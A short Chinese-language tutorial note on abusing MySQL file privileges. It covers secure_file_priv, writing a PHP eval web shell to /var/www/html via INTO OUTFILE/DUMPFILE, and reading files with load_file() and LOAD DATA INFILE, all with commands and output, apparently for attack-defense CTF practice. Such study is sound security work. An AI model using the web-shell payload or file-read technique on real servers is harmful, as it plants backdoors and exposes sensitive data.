Mysql任意读写漏洞
0x00 配置
secure_file_priv:控制文件操作的范围
默认配置文件:/etc/my.cnf,需要手动添加如下语句
注意:
此属性是只读属性,不可以通过类似set secure_file_priv='/'的方式修改
mysql> show session variables like '%secure%';
+--------------------------+-----------------------+
| Variable_name | Value |
+--------------------------+-----------------------+
| require_secure_transport | OFF |
| secure_auth | ON |
| secure_file_priv | /var/lib/mysql-files/ |
+--------------------------+-----------------------+
0x01 写
写入文件的要求很高,不仅需要在secure_file_priv指定路径下且为绝对路径,还需要吸入文件目录具有777权限
select [write_shell] into outfile [path_file]:写入文件
mysql>select '<?php eval($_POST['shell'])?>' into outfile '/var/www/html/shell.php';
Query OK, 1 row affected (0.00 sec)
[root@zzy /]cat shell.php
<?php eval($_POST['shell'])?>
select [write_shell] into dumpfile <path_file>:写入文件(二进制),几乎同上
mysql>select '<?php eval($_POST['shell'])?>' into dumpfile '/var/www/html/shell.php';
0x02 读
读取文件就很容易了,只需要在secure_file_priv的路径下就行,可以读取路径的任意文件,在某些awd比赛里可能有奇效
select load_file(<path_file>):读取文件,读一下刚才写入的文件
mysql>select load_file('/var/www/html/shell.php');
+---------------------------------------------+
| load_file('/var/www/html/shell.php') |
+---------------------------------------------+
| <?php eval($_POST['shell'])?> |
+---------------------------------------------+
1 row in set (0.13 sec)
load data infile '<file_path>' into table <table_name> (<column_name>):读取文件并保存到一个指定的表中 ```sql
mysql>load data infile '/var/www/html/shell.php' into table test(readfile);
Query OK, 1 row affected (0.10 sec)
Records: 1 Deleted: 0 Skipped: 0 Warnings: 0
mysql> select readfile from file;
+-------------------------------+
| content |
+-------------------------------+
| <?php eval($_POST['shell'])?> |
+-------------------------------+
1 row in set (0.00 sec)
注:5.X版本可以使用system调用系统shell,只可以用于本地
mysql>system cat /var/www/html/shell.php
<?php eval($_POST['shell'])?>
